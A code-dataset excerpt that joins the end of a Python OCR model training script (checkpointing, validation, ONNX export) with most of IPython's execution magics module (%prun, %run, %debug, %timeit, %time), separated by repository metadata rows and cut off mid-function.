newer_checkpoint = None
for checkpoint in history_checkpoints:
checkpoint_name = checkpoint.split(".")[0].split("_")
if int(checkpoint_name[2]) > history_step:
newer_checkpoint = checkpoint
history_step = int(checkpoint_name[2])
self.epoch, self.step, self.lr = self.net.load_checkpoint(
os.path.join(self.checkpoints_path, newer_checkpoint))
self.epoch += 1
self.step += 1
self.net.lr = self.lr
else:
logger.info("\nEmpty history checkpoints")
logger.info("\nGet Data Loader...")
loaders = load_cache.GetLoader(project_name)
self.train = loaders.loaders['train']
self.val = loaders.loaders['val']
del loaders
logger.info("\nGet Data Loader End!")
self.loss = 0
self.avg_loss = 0
self.start_time = time.time()
self.now_time = time.time()
def start(self):
val_iter = iter(self.val)
while True:
for idx, (inputs, labels, labels_length) in enumerate(self.train):
self.now_time = time.time()
inputs = self.net.variable_to_device(inputs, device=self.device)
loss, lr = self.net.trainer(inputs, labels, labels_length)
self.avg_loss += loss
self.step += 1
if self.step % 100 == 0 and self.step % self.test_step != 0:
logger.info("{}\tEpoch: {}\tStep: {}\tLastLoss: {}\tAvgLoss: {}\tLr: {}".format(
time.strftime("[%Y-%m-%d-%H_%M_%S]", time.localtime(self.now_time)), self.epoch, self.step,
str(loss), str(self.avg_loss / 100), lr
))
self.avg_loss = 0
if self.step % self.save_checkpoints_step == 0 and self.step != 0:
model_path = os.path.join(self.checkpoints_path, "checkpoint_{}_{}_{}.tar".format(
self.project_name, self.epoch, self.step,
))
self.net.scheduler.step()
self.net.save_model(model_path,
{"net": self.net.state_dict(), "optimizer": self.net.optimizer.state_dict(),
"epoch": self.epoch, "step": self.step, "lr": lr})
if self.step % self.test_step == 0:
try:
test_inputs, test_labels, test_labels_length = next(val_iter)
except Exception:
del val_iter
val_iter = iter(self.val)
test_inputs, test_labels, test_labels_length = next(val_iter)
if test_inputs.shape[0] < 5:
continue
test_inputs = self.net.variable_to_device(test_inputs, self.device)
self.net = self.net.train(False)
pred_labels, labels_list, correct_list, error_list = self.net.tester(test_inputs, test_labels,
test_labels_length)
self.net = self.net.train()
accuracy = len(correct_list) / test_inputs.shape[0]
logger.info("{}\tEpoch: {}\tStep: {}\tLastLoss: {}\tAvgLoss: {}\tLr: {}\tAcc: {}".format(
time.strftime("[%Y-%m-%d-%H_%M_%S]", time.localtime(self.now_time)), self.epoch, self.step,
str(loss), str(self.avg_loss / 100), lr, accuracy
))
self.avg_loss = 0
if accuracy > self.target_acc and self.epoch > self.min_epoch and self.avg_loss < self.max_loss:
logger.info("\nTraining Finished!Exporting Model...")
dummy_input = self.net.get_random_tensor()
input_names = ["input1"]
output_names = ["output"]
if self.net.backbone.startswith("effnet"):
self.net.cnn.set_swish(memory_efficient=False)
self.net = self.net.eval().cpu()
dynamic_ax = {'input1': {3: 'image_wdith'}, "output": {1: 'seq'}}
self.net.export_onnx(self.net, dummy_input,
os.path.join(self.models_path, "{}_{}_{}_{}_{}.onnx".format(
self.project_name, str(accuracy), self.epoch, self.step,
time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime(self.now_time))))
, input_names, output_names, dynamic_ax)
with open(os.path.join(self.models_path, "charset.json"), 'w', encoding="utf-8") as f:
f.write(json.dumps(self.net.charset, ensure_ascii=False))
logger.info("\nExport Finished!Using Time: {}min".format(
str(int(int(self.now_time) - int(self.start_time)) / 60)))
exit()
self.epoch += 1
if __name__ == '__main__':
Train("test1")
| 47.11465 | 117 | 0.517913 |
795bbd208d7abb7ac3d7af358f93e9ab4b6c9d6f | 49,552 | py | Python | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-03-12T02:52:13.000Z | 2020-03-12T02:52:13.000Z | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | null | null | null | # -*- coding: utf-8 -*-
"""Implementation of execution-related magic functions.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 The IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Stdlib
import __builtin__ as builtin_mod
import ast
import bdb
import os
import sys
import time
from StringIO import StringIO
# cProfile was added in Python2.5
try:
import cProfile as profile
import pstats
except ImportError:
# profile isn't bundled by default in Debian for license reasons
try:
import profile, pstats
except ImportError:
profile = pstats = None
# Our own packages
from IPython.core import debugger, oinspect
from IPython.core import magic_arguments
from IPython.core import page
from IPython.core.error import UsageError
from IPython.core.macro import Macro
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic, on_off, needs_local_scope)
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import py3compat
from IPython.utils.contexts import preserve_keys
from IPython.utils.io import capture_output
from IPython.utils.ipstruct import Struct
from IPython.utils.module_paths import find_mod
from IPython.utils.path import get_py_filename, unquote_filename, shellglob
from IPython.utils.timing import clock, clock2
from IPython.utils.warn import warn, error
#-----------------------------------------------------------------------------
# Magic implementation classes
#-----------------------------------------------------------------------------
class TimeitResult(object):
"""
Object returned by the timeit magic with info about the run.
Contain the following attributes :
loops: (int) number of loop done per measurement
repeat: (int) number of time the mesurement has been repeated
best: (float) best execusion time / number
all_runs: (list of float) execusion time of each run (in s)
compile_time: (float) time of statement compilation (s)
"""
def __init__(self, loops, repeat, best, all_runs, compile_time, precision):
self.loops = loops
self.repeat = repeat
self.best = best
self.all_runs = all_runs
self.compile_time = compile_time
self._precision = precision
def _repr_pretty_(self, p , cycle):
unic = u"%d loops, best of %d: %s per loop" % (self.loops, self.repeat,
_format_time(self.best, self._precision))
p.text(u'<TimeitResult : '+unic+u'>')
@magics_class
class ExecutionMagics(Magics):
"""Magics related to code execution, debugging, profiling, etc.
"""
def __init__(self, shell):
super(ExecutionMagics, self).__init__(shell)
if profile is None:
self.prun = self.profile_missing_notice
# Default execution function used to actually run user code.
self.default_runner = None
def profile_missing_notice(self, *args, **kwargs):
error("""\
The profile module could not be found. It has been removed from the standard
python packages because of its non-free license. To use profiling, install the
python-profiler package from non-free.""")
@skip_doctest
@line_cell_magic
def prun(self, parameter_s='', cell=None):
"""Run a statement through the python code profiler.
Usage, in line mode:
%prun [options] statement
Usage, in cell mode:
%%prun [options] [statement]
code...
code...
In cell mode, the additional code lines are appended to the (possibly
empty) statement in the first line. Cell mode allows you to easily
profile multiline blocks without having to put them in a separate
function.
The given statement (which doesn't require quote marks) is run via the
python profiler in a manner similar to the profile.run() function.
Namespaces are internally managed to work correctly; profile.run
cannot be used in IPython because it makes certain assumptions about
namespaces which do not hold under IPython.
Options:
-l <limit>
you can place restrictions on what or how much of the
profile gets printed. The limit value can be:
* A string: only information for function names containing this string
is printed.
* An integer: only these many lines are printed.
* A float (between 0 and 1): this fraction of the report is printed
(for example, use a limit of 0.4 to see the topmost 40% only).
You can combine several limits with repeated use of the option. For
example, ``-l __init__ -l 5`` will print only the topmost 5 lines of
information about class constructors.
-r
return the pstats.Stats object generated by the profiling. This
object has all the information about the profile in it, and you can
later use it for further analysis or in other functions.
-s <key>
sort profile by given key. You can provide more than one key
by using the option several times: '-s key1 -s key2 -s key3...'. The
default sorting key is 'time'.
The following is copied verbatim from the profile documentation
referenced below:
When more than one key is provided, additional keys are used as
secondary criteria when the there is equality in all keys selected
before them.
Abbreviations can be used for any key names, as long as the
abbreviation is unambiguous. The following are the keys currently
defined:
============ =====================
Valid Arg Meaning
============ =====================
"calls" call count
"cumulative" cumulative time
"file" file name
"module" file name
"pcalls" primitive call count
"line" line number
"name" function name
"nfl" name/file/line
"stdname" standard name
"time" internal time
============ =====================
Note that all sorts on statistics are in descending order (placing
most time consuming items first), where as name, file, and line number
searches are in ascending order (i.e., alphabetical). The subtle
distinction between "nfl" and "stdname" is that the standard name is a
sort of the name as printed, which means that the embedded line
numbers get compared in an odd way. For example, lines 3, 20, and 40
would (if the file names were the same) appear in the string order
"20" "3" and "40". In contrast, "nfl" does a numeric compare of the
line numbers. In fact, sort_stats("nfl") is the same as
sort_stats("name", "file", "line").
-T <filename>
save profile results as shown on screen to a text
file. The profile is still shown on screen.
-D <filename>
save (via dump_stats) profile statistics to given
filename. This data is in a format understood by the pstats module, and
is generated by a call to the dump_stats() method of profile
objects. The profile is still shown on screen.
-q
suppress output to the pager. Best used with -T and/or -D above.
If you want to run complete programs under the profiler's control, use
``%run -p [prof_opts] filename.py [args to program]`` where prof_opts
contains profiler specific options as described here.
You can read the complete documentation for the profile module with::
In [1]: import profile; profile.help()
"""
opts, arg_str = self.parse_options(parameter_s, 'D:l:rs:T:q',
list_all=True, posix=False)
if cell is not None:
arg_str += '\n' + cell
arg_str = self.shell.input_splitter.transform_cell(arg_str)
return self._run_with_profiler(arg_str, opts, self.shell.user_ns)
def _run_with_profiler(self, code, opts, namespace):
"""
Run `code` with profiler. Used by ``%prun`` and ``%run -p``.
Parameters
----------
code : str
Code to be executed.
opts : Struct
Options parsed by `self.parse_options`.
namespace : dict
A dictionary for Python namespace (e.g., `self.shell.user_ns`).
"""
# Fill default values for unspecified options:
opts.merge(Struct(D=[''], l=[], s=['time'], T=['']))
prof = profile.Profile()
try:
prof = prof.runctx(code, namespace, namespace)
sys_exit = ''
except SystemExit:
sys_exit = """*** SystemExit exception caught in code being profiled."""
stats = pstats.Stats(prof).strip_dirs().sort_stats(*opts.s)
lims = opts.l
if lims:
lims = [] # rebuild lims with ints/floats/strings
for lim in opts.l:
try:
lims.append(int(lim))
except ValueError:
try:
lims.append(float(lim))
except ValueError:
lims.append(lim)
# Trap output.
stdout_trap = StringIO()
stats_stream = stats.stream
try:
stats.stream = stdout_trap
stats.print_stats(*lims)
finally:
stats.stream = stats_stream
output = stdout_trap.getvalue()
output = output.rstrip()
if 'q' not in opts:
page.page(output)
print sys_exit,
dump_file = opts.D[0]
text_file = opts.T[0]
if dump_file:
dump_file = unquote_filename(dump_file)
prof.dump_stats(dump_file)
print '\n*** Profile stats marshalled to file',\
repr(dump_file)+'.',sys_exit
if text_file:
text_file = unquote_filename(text_file)
pfile = open(text_file,'w')
pfile.write(output)
pfile.close()
print '\n*** Profile printout saved to text file',\
repr(text_file)+'.',sys_exit
if 'r' in opts:
return stats
else:
return None
@line_magic
def pdb(self, parameter_s=''):
"""Control the automatic calling of the pdb interactive debugger.
Call as '%pdb on', '%pdb 1', '%pdb off' or '%pdb 0'. If called without
argument it works as a toggle.
When an exception is triggered, IPython can optionally call the
interactive pdb debugger after the traceback printout. %pdb toggles
this feature on and off.
The initial state of this feature is set in your configuration
file (the option is ``InteractiveShell.pdb``).
If you want to just activate the debugger AFTER an exception has fired,
without having to type '%pdb on' and rerunning your code, you can use
the %debug magic."""
par = parameter_s.strip().lower()
if par:
try:
new_pdb = {'off':0,'0':0,'on':1,'1':1}[par]
except KeyError:
print ('Incorrect argument. Use on/1, off/0, '
'or nothing for a toggle.')
return
else:
# toggle
new_pdb = not self.shell.call_pdb
# set on the shell
self.shell.call_pdb = new_pdb
print 'Automatic pdb calling has been turned',on_off(new_pdb)
@skip_doctest
@magic_arguments.magic_arguments()
@magic_arguments.argument('--breakpoint', '-b', metavar='FILE:LINE',
help="""
Set break point at LINE in FILE.
"""
)
@magic_arguments.argument('statement', nargs='*',
help="""
Code to run in debugger.
You can omit this in cell magic mode.
"""
)
@line_cell_magic
def debug(self, line='', cell=None):
"""Activate the interactive debugger.
This magic command support two ways of activating debugger.
One is to activate debugger before executing code. This way, you
can set a break point, to step through the code from the point.
You can use this mode by giving statements to execute and optionally
a breakpoint.
The other one is to activate debugger in post-mortem mode. You can
activate this mode simply running %debug without any argument.
If an exception has just occurred, this lets you inspect its stack
frames interactively. Note that this will always work only on the last
traceback that occurred, so you must call this quickly after an
exception that you wish to inspect has fired, because if another one
occurs, it clobbers the previous one.
If you want IPython to automatically do this on every exception, see
the %pdb magic for more details.
"""
args = magic_arguments.parse_argstring(self.debug, line)
if not (args.breakpoint or args.statement or cell):
self._debug_post_mortem()
else:
code = "\n".join(args.statement)
if cell:
code += "\n" + cell
self._debug_exec(code, args.breakpoint)
def _debug_post_mortem(self):
self.shell.debugger(force=True)
def _debug_exec(self, code, breakpoint):
if breakpoint:
(filename, bp_line) = breakpoint.split(':', 1)
bp_line = int(bp_line)
else:
(filename, bp_line) = (None, None)
self._run_with_debugger(code, self.shell.user_ns, filename, bp_line)
@line_magic
def tb(self, s):
"""Print the last traceback with the currently active exception mode.
See %xmode for changing exception reporting modes."""
self.shell.showtraceback()
@skip_doctest
@line_magic
def run(self, parameter_s='', runner=None,
file_finder=get_py_filename):
"""Run the named file inside IPython as a program.
Usage::
%run [-n -i -e -G]
[( -t [-N<N>] | -d [-b<N>] | -p [profile options] )]
( -m mod | file ) [args]
Parameters after the filename are passed as command-line arguments to
the program (put in sys.argv). Then, control returns to IPython's
prompt.
This is similar to running at a system prompt ``python file args``,
but with the advantage of giving you IPython's tracebacks, and of
loading all variables into your interactive namespace for further use
(unless -p is used, see below).
The file is executed in a namespace initially consisting only of
``__name__=='__main__'`` and sys.argv constructed as indicated. It thus
sees its environment as if it were being run as a stand-alone program
(except for sharing global objects such as previously imported
modules). But after execution, the IPython interactive namespace gets
updated with all variables defined in the program (except for __name__
and sys.argv). This allows for very convenient loading of code for
interactive work, while giving each program a 'clean sheet' to run in.
Arguments are expanded using shell-like glob match. Patterns
'*', '?', '[seq]' and '[!seq]' can be used. Additionally,
tilde '~' will be expanded into user's home directory. Unlike
real shells, quotation does not suppress expansions. Use
*two* back slashes (e.g. ``\\\\*``) to suppress expansions.
To completely disable these expansions, you can use -G flag.
Options:
-n
__name__ is NOT set to '__main__', but to the running file's name
without extension (as python does under import). This allows running
scripts and reloading the definitions in them without calling code
protected by an ``if __name__ == "__main__"`` clause.
-i
run the file in IPython's namespace instead of an empty one. This
is useful if you are experimenting with code written in a text editor
which depends on variables defined interactively.
-e
ignore sys.exit() calls or SystemExit exceptions in the script
being run. This is particularly useful if IPython is being used to
run unittests, which always exit with a sys.exit() call. In such
cases you are interested in the output of the test results, not in
seeing a traceback of the unittest module.
-t
print timing information at the end of the run. IPython will give
you an estimated CPU time consumption for your script, which under
Unix uses the resource module to avoid the wraparound problems of
time.clock(). Under Unix, an estimate of time spent on system tasks
is also given (for Windows platforms this is reported as 0.0).
If -t is given, an additional ``-N<N>`` option can be given, where <N>
must be an integer indicating how many times you want the script to
run. The final timing report will include total and per run results.
For example (testing the script uniq_stable.py)::
In [1]: run -t uniq_stable
IPython CPU timings (estimated):
User : 0.19597 s.
System: 0.0 s.
In [2]: run -t -N5 uniq_stable
IPython CPU timings (estimated):
Total runs performed: 5
Times : Total Per run
User : 0.910862 s, 0.1821724 s.
System: 0.0 s, 0.0 s.
-d
run your program under the control of pdb, the Python debugger.
This allows you to execute your program step by step, watch variables,
etc. Internally, what IPython does is similar to calling::
pdb.run('execfile("YOURFILENAME")')
with a breakpoint set on line 1 of your file. You can change the line
number for this automatic breakpoint to be <N> by using the -bN option
(where N must be an integer). For example::
%run -d -b40 myscript
will set the first breakpoint at line 40 in myscript.py. Note that
the first breakpoint must be set on a line which actually does
something (not a comment or docstring) for it to stop execution.
Or you can specify a breakpoint in a different file::
%run -d -b myotherfile.py:20 myscript
When the pdb debugger starts, you will see a (Pdb) prompt. You must
first enter 'c' (without quotes) to start execution up to the first
breakpoint.
Entering 'help' gives information about the use of the debugger. You
can easily see pdb's full documentation with "import pdb;pdb.help()"
at a prompt.
-p
run program under the control of the Python profiler module (which
prints a detailed report of execution times, function calls, etc).
You can pass other options after -p which affect the behavior of the
profiler itself. See the docs for %prun for details.
In this mode, the program's variables do NOT propagate back to the
IPython interactive namespace (because they remain in the namespace
where the profiler executes them).
Internally this triggers a call to %prun, see its documentation for
details on the options available specifically for profiling.
There is one special usage for which the text above doesn't apply:
if the filename ends with .ipy, the file is run as ipython script,
just as if the commands were written on IPython prompt.
-m
specify module name to load instead of script path. Similar to
the -m option for the python interpreter. Use this option last if you
want to combine with other %run options. Unlike the python interpreter
only source modules are allowed no .pyc or .pyo files.
For example::
%run -m example
will run the example module.
-G
disable shell-like glob expansion of arguments.
"""
# get arguments and set sys.argv for program to be run.
opts, arg_lst = self.parse_options(parameter_s,
'nidtN:b:pD:l:rs:T:em:G',
mode='list', list_all=1)
if "m" in opts:
modulename = opts["m"][0]
modpath = find_mod(modulename)
if modpath is None:
warn('%r is not a valid modulename on sys.path'%modulename)
return
arg_lst = [modpath] + arg_lst
try:
filename = file_finder(arg_lst[0])
except IndexError:
warn('you must provide at least a filename.')
print '\n%run:\n', oinspect.getdoc(self.run)
return
except IOError as e:
try:
msg = str(e)
except UnicodeError:
msg = e.message
error(msg)
return
if filename.lower().endswith('.ipy'):
with preserve_keys(self.shell.user_ns, '__file__'):
self.shell.user_ns['__file__'] = filename
self.shell.safe_execfile_ipy(filename)
return
# Control the response to exit() calls made by the script being run
exit_ignore = 'e' in opts
# Make sure that the running script gets a proper sys.argv as if it
# were run from a system shell.
save_argv = sys.argv # save it for later restoring
if 'G' in opts:
args = arg_lst[1:]
else:
# tilde and glob expansion
args = shellglob(map(os.path.expanduser, arg_lst[1:]))
sys.argv = [filename] + args # put in the proper filename
# protect sys.argv from potential unicode strings on Python 2:
if not py3compat.PY3:
sys.argv = [ py3compat.cast_bytes(a) for a in sys.argv ]
if 'i' in opts:
# Run in user's interactive namespace
prog_ns = self.shell.user_ns
__name__save = self.shell.user_ns['__name__']
prog_ns['__name__'] = '__main__'
main_mod = self.shell.user_module
# Since '%run foo' emulates 'python foo.py' at the cmd line, we must
# set the __file__ global in the script's namespace
# TK: Is this necessary in interactive mode?
prog_ns['__file__'] = filename
else:
# Run in a fresh, empty namespace
if 'n' in opts:
name = os.path.splitext(os.path.basename(filename))[0]
else:
name = '__main__'
# The shell MUST hold a reference to prog_ns so after %run
# exits, the python deletion mechanism doesn't zero it out
# (leaving dangling references). See interactiveshell for details
main_mod = self.shell.new_main_mod(filename, name)
prog_ns = main_mod.__dict__
# pickle fix. See interactiveshell for an explanation. But we need to
# make sure that, if we overwrite __main__, we replace it at the end
main_mod_name = prog_ns['__name__']
if main_mod_name == '__main__':
restore_main = sys.modules['__main__']
else:
restore_main = False
# This needs to be undone at the end to prevent holding references to
# every single object ever created.
sys.modules[main_mod_name] = main_mod
if 'p' in opts or 'd' in opts:
if 'm' in opts:
code = 'run_module(modulename, prog_ns)'
code_ns = {
'run_module': self.shell.safe_run_module,
'prog_ns': prog_ns,
'modulename': modulename,
}
else:
code = 'execfile(filename, prog_ns)'
code_ns = {
'execfile': self.shell.safe_execfile,
'prog_ns': prog_ns,
'filename': get_py_filename(filename),
}
try:
stats = None
with self.shell.readline_no_record:
if 'p' in opts:
stats = self._run_with_profiler(code, opts, code_ns)
else:
if 'd' in opts:
bp_file, bp_line = parse_breakpoint(
opts.get('b', ['1'])[0], filename)
self._run_with_debugger(
code, code_ns, filename, bp_line, bp_file)
else:
if 'm' in opts:
def run():
self.shell.safe_run_module(modulename, prog_ns)
else:
if runner is None:
runner = self.default_runner
if runner is None:
runner = self.shell.safe_execfile
def run():
runner(filename, prog_ns, prog_ns,
exit_ignore=exit_ignore)
if 't' in opts:
# timed execution
try:
nruns = int(opts['N'][0])
if nruns < 1:
error('Number of runs must be >=1')
return
except (KeyError):
nruns = 1
self._run_with_timing(run, nruns)
else:
# regular execution
run()
if 'i' in opts:
self.shell.user_ns['__name__'] = __name__save
else:
# update IPython interactive namespace
# Some forms of read errors on the file may mean the
# __name__ key was never set; using pop we don't have to
# worry about a possible KeyError.
prog_ns.pop('__name__', None)
with preserve_keys(self.shell.user_ns, '__file__'):
self.shell.user_ns.update(prog_ns)
finally:
# It's a bit of a mystery why, but __builtins__ can change from
# being a module to becoming a dict missing some key data after
# %run. As best I can see, this is NOT something IPython is doing
# at all, and similar problems have been reported before:
# http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-10/0188.html
# Since this seems to be done by the interpreter itself, the best
# we can do is to at least restore __builtins__ for the user on
# exit.
self.shell.user_ns['__builtins__'] = builtin_mod
# Ensure key global structures are restored
sys.argv = save_argv
if restore_main:
sys.modules['__main__'] = restore_main
else:
# Remove from sys.modules the reference to main_mod we'd
# added. Otherwise it will trap references to objects
# contained therein.
del sys.modules[main_mod_name]
return stats
def _run_with_debugger(self, code, code_ns, filename=None,
bp_line=None, bp_file=None):
"""
Run `code` in debugger with a break point.
Parameters
----------
code : str
Code to execute.
code_ns : dict
A namespace in which `code` is executed.
filename : str
`code` is ran as if it is in `filename`.
bp_line : int, optional
Line number of the break point.
bp_file : str, optional
Path to the file in which break point is specified.
`filename` is used if not given.
Raises
------
UsageError
If the break point given by `bp_line` is not valid.
"""
deb = debugger.Pdb(self.shell.colors)
# reset Breakpoint state, which is moronically kept
# in a class
bdb.Breakpoint.next = 1
bdb.Breakpoint.bplist = {}
bdb.Breakpoint.bpbynumber = [None]
if bp_line is not None:
# Set an initial breakpoint to stop execution
maxtries = 10
bp_file = bp_file or filename
checkline = deb.checkline(bp_file, bp_line)
if not checkline:
for bp in range(bp_line + 1, bp_line + maxtries + 1):
if deb.checkline(bp_file, bp):
break
else:
msg = ("\nI failed to find a valid line to set "
"a breakpoint\n"
"after trying up to line: %s.\n"
"Please set a valid breakpoint manually "
"with the -b option." % bp)
raise UsageError(msg)
# if we find a good linenumber, set the breakpoint
deb.do_break('%s:%s' % (bp_file, bp_line))
if filename:
# Mimic Pdb._runscript(...)
deb._wait_for_mainpyfile = True
deb.mainpyfile = deb.canonic(filename)
# Start file run
print "NOTE: Enter 'c' at the %s prompt to continue execution." % deb.prompt
try:
if filename:
# save filename so it can be used by methods on the deb object
deb._exec_filename = filename
deb.run(code, code_ns)
except:
etype, value, tb = sys.exc_info()
# Skip three frames in the traceback: the %run one,
# one inside bdb.py, and the command-line typed by the
# user (run by exec in pdb itself).
self.shell.InteractiveTB(etype, value, tb, tb_offset=3)
@staticmethod
def _run_with_timing(run, nruns):
"""
Run function `run` and print timing information.
Parameters
----------
run : callable
Any callable object which takes no argument.
nruns : int
Number of times to execute `run`.
"""
twall0 = time.time()
if nruns == 1:
t0 = clock2()
run()
t1 = clock2()
t_usr = t1[0] - t0[0]
t_sys = t1[1] - t0[1]
print "\nIPython CPU timings (estimated):"
print " User : %10.2f s." % t_usr
print " System : %10.2f s." % t_sys
else:
runs = range(nruns)
t0 = clock2()
for nr in runs:
run()
t1 = clock2()
t_usr = t1[0] - t0[0]
t_sys = t1[1] - t0[1]
print "\nIPython CPU timings (estimated):"
print "Total runs performed:", nruns
print " Times : %10s %10s" % ('Total', 'Per run')
print " User : %10.2f s, %10.2f s." % (t_usr, t_usr / nruns)
print " System : %10.2f s, %10.2f s." % (t_sys, t_sys / nruns)
twall1 = time.time()
print "Wall time: %10.2f s." % (twall1 - twall0)
@skip_doctest
@line_cell_magic
def timeit(self, line='', cell=None):
"""Time execution of a Python statement or expression
Usage, in line mode:
%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] statement
or in cell mode:
%%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] setup_code
code
code...
Time execution of a Python statement or expression using the timeit
module. This function can be used both as a line and cell magic:
- In line mode you can time a single-line statement (though multiple
ones can be chained with using semicolons).
- In cell mode, the statement in the first line is used as setup code
(executed but not timed) and the body of the cell is timed. The cell
body has access to any variables created in the setup code.
Options:
-n<N>: execute the given statement <N> times in a loop. If this value
is not given, a fitting value is chosen.
-r<R>: repeat the loop iteration <R> times and take the best result.
Default: 3
-t: use time.time to measure the time, which is the default on Unix.
This function measures wall time.
-c: use time.clock to measure the time, which is the default on
Windows and measures wall time. On Unix, resource.getrusage is used
instead and returns the CPU user time.
-p<P>: use a precision of <P> digits to display the timing result.
Default: 3
-q: Quiet, do not print result.
-o: return a TimeitResult that can be stored in a variable to inspect
the result in more details.
Examples
--------
::
In [1]: %timeit pass
10000000 loops, best of 3: 53.3 ns per loop
In [2]: u = None
In [3]: %timeit u is None
10000000 loops, best of 3: 184 ns per loop
In [4]: %timeit -r 4 u == None
1000000 loops, best of 4: 242 ns per loop
In [5]: import time
In [6]: %timeit -n1 time.sleep(2)
1 loops, best of 3: 2 s per loop
The times reported by %timeit will be slightly higher than those
reported by the timeit.py script when variables are accessed. This is
due to the fact that %timeit executes the statement in the namespace
of the shell, compared with timeit.py, which uses a single setup
statement to import function or create variables. Generally, the bias
does not matter as long as results from timeit.py are not mixed with
those from %timeit."""
import timeit
opts, stmt = self.parse_options(line,'n:r:tcp:qo',
posix=False, strict=False)
if stmt == "" and cell is None:
return
timefunc = timeit.default_timer
number = int(getattr(opts, "n", 0))
repeat = int(getattr(opts, "r", timeit.default_repeat))
precision = int(getattr(opts, "p", 3))
quiet = 'q' in opts
return_result = 'o' in opts
if hasattr(opts, "t"):
timefunc = time.time
if hasattr(opts, "c"):
timefunc = clock
timer = timeit.Timer(timer=timefunc)
# this code has tight coupling to the inner workings of timeit.Timer,
# but is there a better way to achieve that the code stmt has access
# to the shell namespace?
transform = self.shell.input_splitter.transform_cell
if cell is None:
# called as line magic
ast_setup = ast.parse("pass")
ast_stmt = ast.parse(transform(stmt))
else:
ast_setup = ast.parse(transform(stmt))
ast_stmt = ast.parse(transform(cell))
ast_setup = self.shell.transform_ast(ast_setup)
ast_stmt = self.shell.transform_ast(ast_stmt)
# This codestring is taken from timeit.template - we fill it in as an
# AST, so that we can apply our AST transformations to the user code
# without affecting the timing code.
timeit_ast_template = ast.parse('def inner(_it, _timer):\n'
' setup\n'
' _t0 = _timer()\n'
' for _i in _it:\n'
' stmt\n'
' _t1 = _timer()\n'
' return _t1 - _t0\n')
class TimeitTemplateFiller(ast.NodeTransformer):
"This is quite tightly tied to the template definition above."
def visit_FunctionDef(self, node):
"Fill in the setup statement"
self.generic_visit(node)
if node.name == "inner":
node.body[:1] = ast_setup.body
return node
def visit_For(self, node):
"Fill in the statement to be timed"
if getattr(getattr(node.body[0], 'value', None), 'id', None) == 'stmt':
node.body = ast_stmt.body
return node
timeit_ast = TimeitTemplateFiller().visit(timeit_ast_template)
timeit_ast = ast.fix_missing_locations(timeit_ast)
# Track compilation time so it can be reported if too long
# Minimum time above which compilation time will be reported
tc_min = 0.1
t0 = clock()
code = compile(timeit_ast, "<magic-timeit>", "exec")
tc = clock()-t0
ns = {}
exec code in self.shell.user_ns, ns
timer.inner = ns["inner"]
if number == 0:
# determine number so that 0.2 <= total time < 2.0
number = 1
for i in range(1, 10):
if timer.timeit(number) >= 0.2:
break
number *= 10
all_runs = timer.repeat(repeat, number)
best = min(all_runs) / number
if not quiet :
print u"%d loops, best of %d: %s per loop" % (number, repeat,
_format_time(best, precision))
if tc > tc_min:
print "Compiler time: %.2f s" % tc
if return_result:
return TimeitResult(number, repeat, best, all_runs, tc, precision)
@skip_doctest
@needs_local_scope
@line_cell_magic
def time(self,line='', cell=None, local_ns=None):
"""Time execution of a Python statement or expression.
The CPU and wall clock times are printed, and the value of the
expression (if any) is returned. Note that under Win32, system time
is always reported as 0, since it can not be measured.
This function can be used both as a line and cell magic:
- In line mode you can time a single-line statement (though multiple
ones can be chained with using semicolons).
- In cell mode, you can time the cell body (a directly
following statement raises an error).
This function provides very basic timing functionality. Use the timeit
magic for more controll over the measurement.
Examples
--------
::
In [1]: %time 2**128
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00
Out[1]: 340282366920938463463374607431768211456L
In [2]: n = 1000000
In [3]: %time sum(range(n))
CPU times: user 1.20 s, sys: 0.05 s, total: 1.25 s
Wall time: 1.37
Out[3]: 499999500000L
In [4]: %time print 'hello world'
hello world
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00
Note that the time needed by Python to compile the given expression
will be reported if it is more than 0.1s. In this example, the
actual exponentiation is done by Python at compilation time, so while
the expression can take a noticeable amount of time to compute, that
time is purely due to the compilation:
In [5]: %time 3**9999;
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00 s
In [6]: %time 3**999999;
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00 s
Compiler : 0.78 s
"""
# fail immediately if the given expression can't be compiled
if line and cell:
raise UsageError("Can't use statement directly after '%%time'!")
if cell:
expr = self.shell.input_transformer_manager.transform_cell(cell)
else:
expr = self.shell.input_transformer_manager.transform_cell(line)
# Minimum time above which parse time will be reported
tp_min = 0.1
t0 = clock()
expr_ast = ast.parse(expr)
tp = clock()-t0
# Apply AST transformations
expr_ast = self.shell.transform_ast(expr_ast)
# Minimum time above which compilation time will be reported
tc_min = 0.1
if len(expr_ast.body)==1 and isinstance(expr_ast.body[0], ast.Expr):
mode = 'eval'
source = '<timed eval>'
expr_ast = ast.Expression(expr_ast.body[0].value)
else:
mode = 'exec'
source = '<timed exec>'
t0 = clock()
code = compile(expr_ast, source, mode)
tc = clock()-t0
# skew measurement as little as possible
glob = self.shell.user_ns
wtime = time.time
# time execution
wall_st = wtime()
if mode=='eval':
st = clock2()
out = eval(code, glob, local_ns)
end = clock2()
else:
st = clock2()
exec code in glob, local_ns
end = clock2()
out = None
wall_end = wtime()
# Compute actual times and report
wall_time = wall_end-wall_st
cpu_user = end[0]-st[0]
cpu_sys = end[1]-st[1]
cpu_tot = cpu_user+cpu_sys
# On windows cpu_sys is always zero, so no new information to the next print
if sys.platform != 'win32':
print "CPU times: user %s, sys: %s, total: %s" % \
